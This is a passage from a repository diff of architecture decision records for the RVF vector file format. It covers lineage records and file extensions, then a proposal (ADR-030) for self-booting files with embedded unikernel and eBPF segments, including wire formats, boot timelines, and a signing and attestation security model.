|------|-------------|
| `FileIdentity` (68B) | file_id[16] + parent_id[16] + parent_hash[32] + depth(u32) |
| `LineageRecord` (128B) | Full derivation record with description for witness chains |
| `DerivationType` (u8) | Clone=0, Filter=1, Merge=2, Quantize=3, Reindex=4, Transform=5, Snapshot=6 |
#### Witness Integration
Lineage events are recorded in WITNESS_SEG with new type codes:
| Witness Type | Code | Purpose |
|-------------|------|---------|
| DERIVATION | 0x09 | File derived from parent |
| LINEAGE_MERGE | 0x0A | Multi-parent merge |
| LINEAGE_SNAPSHOT | 0x0B | Point-in-time snapshot |
| LINEAGE_TRANSFORM | 0x0C | Arbitrary transformation |
| LINEAGE_VERIFY | 0x0D | Lineage chain verification |
#### Extension Aliasing
`.rvdna` is an alternative extension for RVF files using `DomainProfile::Rvdna`.
The authoritative profile lives in the `Level0Root.profile_id` byte; extensions
serve as hints for tooling and file managers.
| Extension | Profile | Domain |
|-----------|---------|--------|
| `.rvf` | Generic | General-purpose vectors |
| `.rvdna` | Rvdna | Genomics (codon, k-mer, motif embeddings) |
| `.rvtext` | RvText | Language (sentence, document embeddings) |
| `.rvgraph` | RvGraph | Graph (node, edge, subgraph embeddings) |
| `.rvvis` | RvVision | Vision (patch, image, object embeddings) |
### Quantum Vector Space Optimizations
RVF is designed to be quantum-ready at the storage layer. Quantum vector space
optimizations extend the format's utility for quantum-classical hybrid workloads:
1. **Quantum State Vectors**: RVF's VEC_SEG natively supports complex-valued
vectors (fp32 pairs) for storing quantum state amplitudes. The `DataType`
enum accommodates complex64 and complex128 types.
2. **Hilbert Space Indexing**: HNSW layers in INDEX_SEG can index over
quantum fidelity metrics (trace distance, Bures distance) via pluggable
distance functions in the runtime's `DistanceMetric` trait.
3. **Quantum Error Correction Metadata**: META_SEG stores syndrome tables,
stabilizer codes, and logical-physical qubit mappings alongside vectors,
enabling QEC-aware retrieval.
4. **Tensor Product Decomposition**: RVF segments support factored storage
where large quantum state vectors are stored as tensor products of smaller
sub-vectors, reducing storage from O(2^n) to O(n * 2^k) for k-local states.
5. **Post-Quantum Cryptographic Signatures**: ML-DSA-65 (Dilithium) signatures
in CRYPTO_SEG ensure quantum-resistant integrity verification.
6. **Variational Quantum Eigensolver (VQE) Snapshots**: SKETCH_SEG stores
parameterized circuit snapshots and their corresponding expectation values,
enabling efficient VQE optimization history retrieval.
### RuVLLM Integration
RVF serves as the native storage format for RuVLLM (RuVector Large Language
Model) inference and fine-tuning pipelines:
1. **KV-Cache Persistence**: RVF segments store attention key-value caches
for LLM inference resumption. VEC_SEG holds projected K/V matrices with
per-layer segment tagging, enabling instant context restoration.
2. **Embedding Store**: Model embedding tables (token, position, type) are
stored as RVF VEC_SEGs with HNSW indexing for semantic token retrieval
and vocabulary expansion experiments.
3. **LoRA Adapter Storage**: Low-rank adaptation matrices are stored as
compact VEC_SEGs with quantization (int4/int8 via QUANT_SEG), enabling
efficient adapter switching during multi-tenant inference.
4. **Activation Checkpointing**: Intermediate activations during gradient
computation are stored as temperature-tiered RVF segments — hot layers
in HOT_SEG, cold layers in standard VEC_SEG — with automatic promotion.
5. **Prompt Cache / RAG Store**: Retrieval-augmented generation corpora are
RVF files with RVText profile, enabling sub-millisecond semantic search
over cached prompt-response pairs with lineage tracking.
6. **Model Provenance**: Lineage chains track model derivation — base model
→ fine-tuned → quantized → deployed — with cryptographic hashes ensuring
the exact model lineage is verifiable.
## File Extension
- `.rvf` — RuVector Format file (Generic profile)
- `.rvdna` — Genomics domain (Rvdna profile)
- `.rvtext` — Language/text domain (RvText profile)
- `.rvgraph` — Graph/network domain (RvGraph profile)
- `.rvvis` — Vision/imagery domain (RvVision profile)
- `.rvf.cold.N` — Cold shard N (multi-file mode)
- `.rvf.idx.N` — Index shard N (multi-file mode)
## MIME Type
- `application/x-ruvector-format` (pending IANA registration)
## Related Decisions
- **ADR-001**: Core architecture (storage layer superseded by RVF)
- **ADR-003**: SIMD optimization (RVF adopts 64-byte alignment strategy)
- **ADR-005**: WASM runtime (RVF microkernel replaces ad-hoc WASM builds)
- **ADR-006**: Memory management (RVF segment model replaces custom arena)
- **ADR-018**: Block-based storage (RVF VEC_SEG block model supersedes)
- **ADR-021**: Delta compression (RVF OVERLAY_SEG adopts delta approach)
- **RVF Spec**: `docs/research/rvf/` (full specification)
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-02-13 | ruv.io | Initial adoption decision |
| 1.1 | 2026-02-16 | implementation review | Added complete segment type registry documenting all 23 implemented variants including Wasm (0x10), COW segments (0x20-0x23), and domain expansion segments (0x30-0x32). All types have `TryFrom<u8>` round-trip tests in rvf-types. |

View File

@@ -0,0 +1,876 @@
# ADR-030: RVF Cognitive Container -- Self-Booting Vector Files
**Status**: Proposed
**Date**: 2026-02-14
**Authors**: ruv.io, RuVector Architecture Team
**Deciders**: Architecture Review Board
**SDK**: Claude-Flow
**Depends on**: ADR-029 (RVF canonical format), ADR-005 (WASM runtime), ADR-012 (Security remediation)
## Context
### The Passive Data Problem
RVF today is a sophisticated binary format for vector data: it carries embeddings, HNSW indexes, quantization codebooks, cryptographic signatures, and a 5.5 KB WASM microkernel. But it remains fundamentally passive. To serve queries, an external runtime must:
1. Parse the file
2. Load the manifest
3. Build in-memory indexes
4. Expose an API (HTTP, gRPC, or in-process)
5. Manage lifecycle, health checks, and scaling
This external dependency chain creates friction in four critical deployment scenarios:
**Confidential Computing (TEE enclaves)**: Today, deploying vector search inside an SGX/SEV-SNP/TDX enclave requires installing a full runtime inside the enclave, increasing the Trusted Computing Base (TCB) and attack surface. The WITNESS_SEG attestation model (ADR-029) records proofs of TEE execution, but the runtime itself is not attested -- only the data is. A self-booting file that carries its own verified kernel eliminates the unattested runtime gap.
**Serverless vector search**: Lambda-style platforms cold-start a runtime, deserialize the index, and then serve queries. For RVF files under 10 MB, the runtime overhead dominates: Firecracker boots in ~125 ms, but the Node.js/Python runtime on top adds 500-2000 ms. If the .rvf file IS the microservice -- booting directly into a query-serving kernel -- cold start collapses to the Firecracker boot window alone.
**Air-gapped / edge deployment**: Edge nodes in disconnected environments (submarines, satellites, field hospitals, industrial control) cannot rely on package managers or container registries. A single file that self-boots and serves queries removes all host dependencies beyond a hypervisor or bare metal.
**Portable compute**: The AppImage model (self-contained Linux application in a single file) proves that users prefer "download, chmod +x, run." RVF should offer the same experience for vector search: drop a file, it runs.
### Why WASM Alone Is Insufficient
The existing WASM_SEG (Tier 1) provides portable compute at 5.5 KB, but WASM has structural limitations for the scenarios above:
- **No direct hardware access**: WASM cannot bind to NVMe, network interfaces, or TEE hardware without a host runtime.
- **No kernel services**: WASM lacks syscalls for file I/O, networking, memory-mapped I/O, and signal handling.
- **No attestation binding**: WASM modules cannot generate or verify TEE attestation quotes.
- **Performance ceiling**: WASM's linear memory model and lack of SIMD beyond v128 limits throughput for large-scale vector operations.
- **WASI is not yet sufficient**: WASI Preview 2 (stabilized early 2024) covers basic I/O, but WASI 0.3 completion is tracked on the WASI roadmap (wasi.dev/roadmap) with previews available as of early 2026; it still lacks TEE integration, direct device access, and the networking primitives needed for a standalone query server.
These limitations motivate a complementary execution tier that provides kernel-level capabilities while preserving WASM's portability for constrained environments.
## State of the Art
### Rust Unikernels
**Hermit OS / RustyHermit** (RWTH Aachen): A Rust-native unikernel where the application links directly against the kernel library. The kernel supports x86_64, aarch64, and riscv64 targets. The entire kernel is written in Rust with zero C/C++ dependencies, making it composable with Rust applications at link time. Hermit runs on QEMU/KVM, Firecracker, and Uhyve (a custom lightweight VMM). The kernel binary for a minimal application is approximately 200-400 KB compressed, well within the RVF segment budget.
**Theseus OS** (Rice/Yale): A safe-language OS using Rust's ownership model for isolation instead of hardware privilege rings. Runs in a single address space and single privilege level. While not production-ready, its cell-based architecture demonstrates that Rust's type system can enforce kernel-level isolation without MMU overhead -- relevant for TEE enclaves where virtual memory is constrained.
**Asterinas** (USENIX ATC 2025): A Linux ABI-compatible framekernel written in Rust, supporting 230+ syscalls. Its "OSTD" framework confines unsafe Rust to ~14% of the codebase. Asterinas proves that a Rust kernel can achieve Linux-comparable performance while maintaining memory safety guarantees. Its Linux ABI compatibility means existing Rust binaries can run unmodified.
**RuxOS** (syswonder): A modular Rust unikernel that selectively includes only the OS components an application needs, achieving minimal image sizes. Supports multiple architectures including x86_64, aarch64, and riscv64.
### MicroVM Technology
**Firecracker** (AWS, ~50K lines of Rust): Purpose-built for serverless. Achieves <125 ms boot time to init process with <5 MiB memory footprint. Powers AWS Lambda and Fargate. Written entirely in Rust. The minimal attack surface (no USB, no GPU passthrough, no legacy devices) makes it ideal for running untrusted workloads. Firecracker accepts a kernel image + rootfs as inputs -- exactly what a KERNEL_SEG would provide.
**Cloud Hypervisor** (Intel/ARM): A Rust-based VMM targeting cloud workloads. Supports VirtIO devices, VFIO passthrough, and live migration. More feature-rich than Firecracker but larger attack surface.
**Uhyve** (Hermit project): A minimal hypervisor specifically designed for Hermit unikernels. Even faster boot times than Firecracker for single-application workloads because it skips BIOS/UEFI boot and loads the unikernel directly.
### eBPF for Data Processing
**eBPF architecture**: Programs run in the Linux kernel's BPF virtual machine with a JIT compiler producing native code. Programs are verified before execution (no loops, bounded execution, memory safety). Map types (hash tables, arrays, ring buffers, LPM tries) provide shared state between kernel and userspace.
**Aya (Rust eBPF framework)**: Pure Rust eBPF development with BTF (BPF Type Format) support for cross-kernel portability. No C toolchain required. Compiles eBPF programs from Rust source. Supports XDP (eXpress Data Path), TC (Traffic Control), tracepoints, kprobes, and socket filters. FOSDEM 2025 featured sessions on building production eBPF systems with Aya.
**Relevance to vector search**: eBPF programs attached at XDP or TC hooks can perform distance computations on incoming query packets before they reach userspace, reducing round-trip latency. BPF maps can hold hot vectors (top-accessed embeddings) in kernel memory, serving as a kernel-level L0 cache. This maps directly to RVF's temperature tiering model (HOT_SEG).
### Confidential Computing Runtimes
**Enarx** (Confidential Computing Consortium): A deployment platform for WebAssembly inside TEEs. First open-source project donated to the CCC. Supports SGX and SEV-SNP. Uses WASM as the execution format inside the enclave.
**Gramine** (formerly Graphene-SGX): A library OS that runs unmodified Linux applications inside SGX enclaves. Adds ~100-200 KB to the TCB. Widely used in production confidential computing deployments.
**Occlum**: An SGX library OS supporting multi-process, multi-threaded applications. Provides a POSIX-compatible API inside the enclave.
**Key insight**: All current CC runtimes add a separate library OS layer. If the RVF file carries its own kernel that IS the library OS, the TCB shrinks to just the kernel image (which is cryptographically measured) plus the TEE hardware. The attestation quote then covers both data and runtime in a single measurement.
**2025 developments**: The Confidential Computing Consortium's 2025 survey found that CC has become foundational for data-centric innovation, but implementation complexity hinders adoption. Self-booting RVF files address this directly: the deployment complexity collapses to "transfer file, boot."
### Self-Executing Archive Formats
**AppImage**: Self-mounting disk images using FUSE. Users download, `chmod +x`, and run. No installation. The model proves that single-file deployment works at scale for Linux desktop applications.
**binctr** (Jessie Frazelle): Fully static, unprivileged, self-contained containers as executable binaries. Embeds a compressed rootfs inside the binary. Demonstrates that a useful runtime environment can fit in a single self-extracting file.
**Snap / Flatpak**: More complex than AppImage but demonstrate sandboxed execution from self-contained bundles.
**Key gap**: None of these formats are designed for compute workloads that serve network APIs. They all target desktop applications. RVF's KERNEL_SEG fills this gap: a self-booting file that starts a query server, not a GUI.
### WebAssembly System Interface (WASI)
**WASI Preview 2** (stabilized early 2024): Covers basic file I/O, clocks, random, stdout/stderr. The Component Model enables composing WASM modules with typed interfaces (WIT).
**WASI 0.3** (tracked on wasi.dev/roadmap, previews available as of early 2026): Adds native async support with the Component Model. Still lacks TEE integration, direct network socket creation, and the system-level primitives needed for a standalone service.
**WebAssembly vs. Unikernels** (arxiv 2509.09400): A comparative study found that WASM offers lower cold-start latency for lightweight functions but degrades with complex workloads and I/O operations, while Firecracker-based MicroVMs provide stable, higher performance for I/O-heavy tasks like vector search. This validates the three-tier model: WASM for lightweight edge, unikernel for production workloads.
### Post-Quantum Cryptography for Kernel Signing
**ML-DSA-65** (FIPS 204): Module-lattice-based digital signatures at NIST Security Level 3. Multiple pure Rust implementations exist (fips204, ml-dsa, libcrux-ml-dsa crates). The fips204 crate operates in constant time, is `#[no_std]` compatible, has no heap allocations, and exposes the RNG -- suitable for bare-metal and TEE environments. RVF already uses ML-DSA-65 for segment signing in CRYPTO_SEG; the same infrastructure extends naturally to KERNEL_SEG signing.
## Decision
### Add KERNEL_SEG (0x0E) and EBPF_SEG (0x0F) to the RVF segment type registry
Extend the RVF format with two new segment types that embed executable compute alongside vector data, creating a three-tier execution model:
| Tier | Segment | Size | Target Environment | Boot Time |
|------|---------|------|--------------------|-----------|
| **1: WASM** | WASM_SEG (exists) | 5.5 KB | Browser, edge, IoT, Cognitum tiles | <1 ms (instantiate) |
| **2: eBPF** | EBPF_SEG (0x0F) | 10-50 KB | Linux kernel fast path, XDP, TC | <20 ms (load + verify) |
| **3: Unikernel** | KERNEL_SEG (0x0E) | 200 KB - 2 MB | TEE enclaves, Firecracker, bare metal | <125 ms (full boot) |
### Tier Selection Logic
```
if target == browser || target == wasm_runtime {
use WASM_SEG (Tier 1)
} else if linux_kernel_available && query_is_hot_path {
use EBPF_SEG (Tier 2) // kernel-level L0 cache
} else if tee_required || standalone_service {
use KERNEL_SEG (Tier 3) // self-booting
} else {
use host runtime (existing behavior)
}
```
An RVF file MAY contain segments from multiple tiers simultaneously. A file with WASM_SEG + KERNEL_SEG can serve queries from a browser (Tier 1) or boot as a standalone service (Tier 3) from the same file.
## KERNEL_SEG Wire Format
### Segment Header
KERNEL_SEG uses the standard 64-byte SegmentHeader (ADR-029) with `seg_type = 0x0E`. The payload begins with a KernelHeader followed by the compressed kernel image.
### KernelHeader (128 bytes, repr(C))
```
Offset Size Field Description
------ ---- ----- -----------
0x00 4 kernel_magic Magic: 0x52564B4E ("RVKN")
0x04 2 header_version KernelHeader format version (currently 1)
0x06 1 arch Target architecture enum
0x07 1 kernel_type Kernel type enum
0x08 4 kernel_flags Bitfield flags
0x0C 4 min_memory_mb Minimum RAM required (MiB)
0x10 8 entry_point Virtual address of kernel entry point
0x18 8 image_size Uncompressed kernel image size (bytes)
0x20 8 compressed_size Compressed kernel image size (bytes)
0x28 1 compression Compression algorithm (same as SegmentHeader)
0x29 1 api_transport API transport enum
0x2A 2 api_port Default API port (network byte order)
0x2C 4 api_version Supported RVF query API version
0x30 32 image_hash SHAKE-256-256 of uncompressed kernel image
0x50 16 build_id Unique build identifier (UUID v7)
0x60 8 build_timestamp Build time (nanosecond UNIX timestamp)
0x68 4 vcpu_count Recommended vCPU count (0 = single)
0x6C 4 reserved_0 Reserved (must be zero)
0x70 8 cmdline_offset Offset to kernel command line within payload
0x78 4 cmdline_length Length of kernel command line (bytes)
0x7C 4 reserved_1 Reserved (must be zero)
```
### Architecture Enum (u8)
```
Value Name Description
----- ---- -----------
0x00 x86_64 AMD64 / Intel 64
0x01 aarch64 ARM 64-bit (ARMv8-A and later)
0x02 riscv64 RISC-V 64-bit (RV64GC)
0xFE universal Architecture-independent (e.g., interpreted)
0xFF unknown Reserved / unspecified
```
### Kernel Type Enum (u8)
```
Value Name Description
----- ---- -----------
0x00 hermit Hermit OS unikernel (Rust-native)
0x01 micro_linux Minimal Linux kernel (bzImage compatible)
0x02 asterinas Asterinas framekernel (Linux ABI compatible)
0x03 wasi_preview2 WASI Preview 2 component (alternative to WASM_SEG)
0x04 custom Custom kernel (requires external VMM knowledge)
0xFE test_stub Test stub for CI (boots, reports health, exits)
0xFF reserved Reserved
```
### Kernel Flags (u32 bitfield)
```
Bit Name Description
--- ---- -----------
0 REQUIRES_TEE Kernel must run inside a TEE enclave
1 REQUIRES_KVM Kernel requires KVM (hardware virtualization)
2 REQUIRES_UEFI Kernel requires UEFI boot (not raw bzImage)
3 HAS_NETWORKING Kernel includes network stack
4 HAS_QUERY_API Kernel exposes RVF query API on api_port
5 HAS_INGEST_API Kernel exposes RVF ingest API
6 HAS_ADMIN_API Kernel exposes health/metrics API
7 ATTESTATION_READY Kernel can generate TEE attestation quotes
8 SIGNED Kernel image is signed (SignatureFooter follows)
9 MEASURED Kernel measurement stored in WITNESS_SEG
10 COMPRESSED Image is compressed (per compression field)
11 RELOCATABLE Kernel is position-independent
12 HAS_VIRTIO_NET Kernel includes VirtIO network driver
13 HAS_VIRTIO_BLK Kernel includes VirtIO block driver
14 HAS_VSOCK Kernel includes VSOCK for host communication
15-31 reserved Reserved (must be zero)
```
### API Transport Enum (u8)
```
Value Name Description
----- ---- -----------
0x00 tcp_http HTTP/1.1 over TCP (default)
0x01 tcp_grpc gRPC over TCP (HTTP/2)
0x02 vsock VirtIO socket (Firecracker host<->guest)
0x03 shared_mem Shared memory region (for same-host co-location)
0xFF none No network API (batch mode only)
```
### Payload Layout
```
[SegmentHeader: 64 bytes]
[KernelHeader: 128 bytes]
[Kernel command line: cmdline_length bytes, NUL-terminated, padded to 8-byte boundary]
[Compressed kernel image: compressed_size bytes]
[Optional: SignatureFooter if SIGNED flag is set]
```
The kernel image is compressed with the algorithm specified in `KernelHeader.compression`. ZSTD is the recommended default for kernel images due to its high compression ratio at fast decompression speeds (~1.5 GB/s). A 400 KB Hermit unikernel compresses to approximately 150-200 KB with ZSTD level 3.
### Signing
When the `SIGNED` flag is set, a SignatureFooter (identical to the existing RVF SignatureFooter format) is appended after the compressed kernel image. The signature covers the concatenation of:
```
signed_data = KernelHeader || cmdline_bytes || compressed_image
```
The same ML-DSA-65 or Ed25519 keys used for CRYPTO_SEG segment signing can sign KERNEL_SEG. This means a single key pair attests both the data and the runtime, providing end-to-end integrity from a single trust root.
## EBPF_SEG Wire Format
### EbpfHeader (64 bytes, repr(C))
```
Offset Size Field Description
------ ---- ----- -----------
0x00 4 ebpf_magic Magic: 0x52564250 ("RVBP")
0x04 2 header_version EbpfHeader format version (currently 1)
0x06 1 program_type eBPF program type enum
0x07 1 attach_type eBPF attach point enum
0x08 4 program_flags Bitfield flags
0x0C 2 insn_count Number of BPF instructions (max 65535)
0x0E 2 max_dimension Maximum vector dimension this program handles
0x10 8 program_size ELF object size (bytes)
0x18 4 map_count Number of BPF maps defined
0x1C 4 btf_size BTF (BPF Type Format) section size
0x20 32 program_hash SHAKE-256-256 of the ELF object
```
### eBPF Program Type Enum (u8)
```
Value Name Description
----- ---- -----------
0x00 xdp_distance XDP program for distance computation on packets
0x01 tc_filter TC classifier for query routing
0x02 socket_filter Socket filter for query preprocessing
0x03 tracepoint Tracepoint for performance monitoring
0x04 kprobe Kprobe for dynamic instrumentation
0x05 cgroup_skb Cgroup socket buffer filter
0xFF custom Custom program type
```
### eBPF Attach Type Enum (u8)
```
Value Name Description
----- ---- -----------
0x00 xdp_ingress XDP hook on NIC ingress
0x01 tc_ingress TC ingress qdisc
0x02 tc_egress TC egress qdisc
0x03 socket_filter Socket filter attachment
0x04 cgroup_ingress Cgroup ingress
0x05 cgroup_egress Cgroup egress
0xFF none No automatic attachment
```
### Payload Layout
```
[SegmentHeader: 64 bytes]
[EbpfHeader: 64 bytes]
[BPF ELF object: program_size bytes]
[BTF section: btf_size bytes (if btf_size > 0)]
[Map definitions: map_count * 32 bytes]
[Optional: SignatureFooter if SIGNED flag in SegmentHeader]
```
## Execution Model
### Tier 1: WASM Microkernel (Existing)
No changes. The existing 5.5 KB WASM microkernel in WASM_SEG continues to serve as the portable compute layer for browsers, edge devices, and Cognitum tiles. WASM provides the widest deployment reach with the smallest footprint.
### Tier 2: eBPF Fast Path
The eBPF tier accelerates the hot path for Linux-hosted deployments:
1. **Loader** reads EBPF_SEG from the RVF file.
2. **Verifier** (kernel BPF verifier) validates the program.
3. **JIT** compiles to native code.
4. **Attach** to the specified hook point (XDP, TC, tracepoint).
5. **BPF maps** are populated with hot vectors from HOT_SEG.
6. **Query path**: Incoming packets hit the XDP/TC program, which computes distances against the hot vector cache in BPF map memory. Queries that can be satisfied from the hot cache return immediately from kernel space (bypassing all userspace overhead). Cache misses are passed to userspace for full HNSW traversal.
This creates a two-level query architecture:
- **L0 (kernel)**: eBPF program + BPF map hot cache. Sub-microsecond for cache hits.
- **L1 (userspace)**: Full RVF runtime for cache misses. Standard HNSW latency.
The temperature model in SKETCH_SEG determines which vectors are promoted to the eBPF L0 cache.
### Tier 3: Unikernel Self-Boot
The unikernel tier makes the RVF file a self-contained microservice:
1. **Launcher** (rvf-launch CLI or library) reads the KERNEL_SEG and MANIFEST_SEG.
2. **Decompression**: The ZSTD-compressed kernel image is decompressed.
3. **Verification**: The kernel image hash is verified against `KernelHeader.image_hash`. If SIGNED, the SignatureFooter is verified. If MEASURED, the measurement in WITNESS_SEG is cross-checked.
4. **VMM setup**: Firecracker (or Uhyve, or Cloud Hypervisor) is configured:
- vCPUs: `KernelHeader.vcpu_count` (default 1)
- Memory: `KernelHeader.min_memory_mb` (default 32 MiB)
- Kernel: decompressed image
- Boot args: kernel command line from payload
- Block device: the .rvf file itself (read-only virtio-blk)
- Network: virtio-net or vsock per `api_transport`
5. **Boot**: The VMM starts the kernel. The unikernel:
a. Initializes with a minimal runtime (no init system, no systemd).
b. Memory-maps the .rvf file from the virtio-blk device.
c. Reads the Level 0 manifest (4 KB at EOF) for instant hotset access.
d. Starts the query API on the configured port/transport.
e. Begins background progressive index loading (Level 1, Layer B, Layer C).
6. **Ready signal**: The kernel sends a health check response on `api_port`, or a VSOCK notification to the host.
**Boot timeline (target)**:
```
T+0 ms VMM creates microVM
T+5 ms Kernel image loaded into guest memory
T+50 ms Kernel init complete, virtio drivers up
T+55 ms .rvf file memory-mapped, Level 0 parsed
T+60 ms Hot cache loaded, entry points available
T+80 ms Query API listening on api_port
T+125 ms Ready signal sent to host
T+500 ms Layer B loaded (background)
T+2000 ms Layer C loaded, full recall available
```
### Minimum Viable Kernel Profile
The first bootable KERNEL_SEG MUST implement only:
1. **Read-only query API** — k-NN search over embedded vectors
2. **Health endpoint** — Returns 200 when boot is complete and index is loaded
3. **Metrics read** — Basic counters (queries served, latency p50/p99, uptime)
Excluded from the minimum profile (added via KernelFlags):
- Ingest (live vector insertion) — requires `INGEST_ENABLED` flag
- Admin API (compaction, config changes) — requires `ADMIN_ENABLED` flag
- Streaming protocol — requires `STREAMING_ENABLED` flag
This ensures the smallest possible TCB for the initial bootable artifact. Ingest into a self-booting RVF is handled by default via a separate signed update segment (OVERLAY_SEG), not live mutation inside the microVM. Live ingest may be enabled explicitly when the deployment model requires it.
### Cross-Tier Cooperation
A single RVF file can embed all three tiers. The runtime selects the appropriate tier based on the deployment context:
```
.rvf file
|
+-- WASM_SEG -> Browser / IoT / tile (always available)
+-- EBPF_SEG -> Linux kernel fast path (optional, requires CAP_BPF)
+-- KERNEL_SEG -> Self-booting service (optional, requires VMM)
+-- VEC_SEG -> Vector data (always present)
+-- INDEX_SEG -> HNSW index (always present)
+-- ...other segments as needed
```
On a Linux host with Firecracker, the launcher can:
1. Boot the KERNEL_SEG as a microVM.
2. Load EBPF_SEG into the host kernel for the L0 hot cache.
3. Route queries: eBPF handles hot-path hits, microVM handles misses.
In a browser, only the WASM_SEG is used; KERNEL_SEG and EBPF_SEG are ignored.
### Authority Boundary: Host eBPF vs. Guest Kernel
When Tier 2 (eBPF) and Tier 3 (unikernel) operate simultaneously on the same file:
- The **guest kernel** is the authoritative query engine. It owns authentication, rate limiting, audit logging, and witness chain emission.
- The **host eBPF** is an acceleration layer only. It serves cache hits from BPF maps but MUST NOT finalize results without a guest-signed witness record.
- For cache misses, the eBPF program forwards the query to the guest via virtio-vsock. The guest computes the result, emits a witness entry, and returns the response.
- The eBPF program MUST NOT emit witness entries or modify the witness chain.
This rule prevents split-brain policies and ensures a single complete audit trail regardless of which tier served the query.
## Security Model
### Kernel Image Integrity
Every KERNEL_SEG image MUST be integrity-protected by at least one of:
1. **Content hash** (mandatory): `KernelHeader.image_hash` contains the SHAKE-256-256 digest of the uncompressed kernel image. The launcher verifies this before booting.
2. **Cryptographic signature** (recommended): A SignatureFooter with ML-DSA-65 or Ed25519 over the kernel header + command line + compressed image.
3. **TEE measurement** (for confidential computing): A `MEASURED` WITNESS_SEG record containing the kernel's expected measurement (MRENCLAVE for SGX, launch digest for SEV-SNP/TDX).
### Attestation Binding (KERNEL_SEG + WITNESS_SEG)
For confidential computing deployments, KERNEL_SEG and WITNESS_SEG cooperate:
```
KERNEL_SEG:
image_hash = H(kernel_image)
flags: REQUIRES_TEE | ATTESTATION_READY | MEASURED
WITNESS_SEG (witness_type = 0x10, KERNEL_ATTESTATION):
measurement: Expected TEE measurement of the kernel
nonce: Anti-replay nonce
sig_key_id: Reference to signing key in CRYPTO_SEG
evidence: Platform-specific attestation quote
Verification chain:
1. Verify KERNEL_SEG.image_hash matches H(decompressed image)
2. Verify KERNEL_SEG SignatureFooter against CRYPTO_SEG key
3. Boot kernel inside TEE
4. Kernel generates attestation quote
5. Verify quote.measurement == WITNESS_SEG.measurement
6. Verify quote.measurement == H(loaded kernel image)
-> Data + runtime + TEE form a single measured trust chain
```
### Verification Algorithm
A compliant launcher MUST execute these steps in order, failing closed on any error:
1. Read KERNEL_SEG header. Decompress kernel image.
2. Compute SHAKE-256-256 of decompressed bytes. Compare to `image_hash`. **FAIL** if mismatch.
3. If `SIGNED` flag is set: locate SignatureFooter. Verify signature over (KernelHeader || compressed_image). **FAIL** if signature missing or invalid.
4. If `SIGNED` flag is NOT set but launcher policy requires signing: **FAIL** (refuse unsigned kernels in production).
5. If `REQUIRES_TEE` flag is set: verify current environment is a TEE. **FAIL** if running outside enclave/VM.
6. If `MEASURED` flag is set: locate corresponding WITNESS_SEG record with `witness_type = KERNEL_ATTESTATION (0x10)`. Verify `action_hash` matches `image_hash`. **FAIL** if no matching witness or hash mismatch.
7. Boot kernel. Wait for health endpoint. **FAIL** if health not ready within boot timeout.
Failure at any step is fatal. The launcher MUST NOT serve queries from an unverified kernel.
### eBPF Safety
eBPF programs in EBPF_SEG are verified by the Linux kernel's BPF verifier before execution. This provides:
- **Termination guarantee**: No unbounded loops.
- **Memory safety**: All memory accesses are bounds-checked.
- **Privilege separation**: Programs run with restricted capabilities.
- **No kernel crashes**: A verified eBPF program cannot panic or fault the kernel.
Additionally, EBPF_SEG images are hash-verified (`EbpfHeader.program_hash`) and optionally signed, preventing injection of malicious programs.
### eBPF Dimension Constraint
The `max_dimension` field in EbpfHeader declares the maximum vector dimension the program can process. The eBPF verifier requires bounded loops, so each distance computation program is compiled for a fixed maximum dimension.
The loader MUST reject an EBPF_SEG whose `max_dimension` is less than the file's vector dimension. This prevents loading incompatible programs that would produce incorrect results or verifier failures.
Recommended maximum: 2048 dimensions per eBPF program. For higher dimensions, use Tier 1 (WASM) or Tier 3 (unikernel) which have no loop bound constraints.
### Sandbox Boundaries
| Tier | Sandbox | Escape Risk | Mitigation |
|------|---------|-------------|------------|
| WASM | WASM VM (linear memory) | Very Low | Proven isolation model |
| eBPF | BPF verifier + JIT | Very Low | Kernel-enforced bounds |
| Unikernel | VMM (Firecracker/KVM) | Low | Hardware virtualization (VT-x/AMD-V) |
| TEE | Hardware enclave | Very Low | Silicon-level isolation |
### Supply Chain
Kernel images in KERNEL_SEG SHOULD be reproducibly built. The `build_id` (UUID v7) and `build_timestamp` enable tracing a kernel image back to its exact source revision and build environment. Signing with ML-DSA-65 provides post-quantum resistance for the kernel supply chain.
### Reference Implementation
The reference kernel type is **Hermit OS** (https://hermit-os.org/). The build pipeline:
1. Source: `hermit-os/kernel` repository at a pinned git tag
2. Build: `cargo build --target x86_64-unknown-hermit --release`
3. Link: Application (`rvf-runtime` compiled as unikernel) links against Hermit kernel library
4. Compress: `zstd -19` on the resulting ELF binary
5. Embed: `rvf embed-kernel --arch x86_64 --type hermit mydata.rvf`
The build MUST be reproducible: same source + same Rust toolchain = identical `image_hash`. This is enforced by pinning the Rust toolchain version in `rust-toolchain.toml` and recording the `build_id` (UUID v7) in KernelHeader.
### Signing Algorithm Selection
| Context | Algorithm | Rationale |
|---------|-----------|-----------|
| Developer iteration, CI builds | Ed25519 | Fast (us), small signatures (64 bytes), existing key infrastructure |
| Published releases, public distribution | ML-DSA-65 (FIPS 204) | Post-quantum resistance, NIST standardized |
| Migration period | Dual (Ed25519 + ML-DSA-65) | SignatureFooter supports a signature list; verifiers accept either |
| After cutover (configurable date) | ML-DSA-65 only | Files with `REQUIRES_PQ` flag reject Ed25519-only signatures |
This matches ADR-029's key authority model and ensures backward compatibility during the post-quantum transition.
## Backward Compatibility
### KERNEL_SEG and EBPF_SEG are fully optional
Files without these segments work exactly as they do today. The new segment types use previously unassigned discriminator values (0x0E and 0x0F), which existing readers will skip as unknown segments per the RVF forward-compatibility rule: "Unknown segment types MUST be skipped by readers that do not understand them."
### Level 0 Root Manifest Extension
The Level0Root reserved area (offset 0xF00, 252 bytes) contains a KernelPtr (16 bytes) at offset 0xF44:
```
Offset Size Field Description
------ ---- ----- -----------
0xF44 8 kernel_seg_offset Byte offset to first KERNEL_SEG (0 if absent)
0xF4C 4 kernel_seg_length Byte length of KERNEL_SEG payload
0xF50 4 kernel_flags_hint Copy of KernelHeader.kernel_flags for fast scanning
```
Old readers see zeros at these offsets and continue working normally. New readers check `kernel_seg_offset != 0` to determine if the file is self-booting.
### SegmentType Registry Update
All computational segment types are now implemented in `rvf-types/src/segment_type.rs`:
```rust
#[repr(u8)]
pub enum SegmentType {
// ... existing types 0x00 - 0x0D ...
/// Embedded kernel / unikernel image for self-booting.
Kernel = 0x0E,
/// Embedded eBPF program for kernel fast path.
Ebpf = 0x0F,
/// Embedded WASM bytecode for self-bootstrapping execution.
Wasm = 0x10,
// ... COW segments 0x20-0x23 (ADR-031) ...
// ... Domain expansion segments 0x30-0x32 ...
}
```
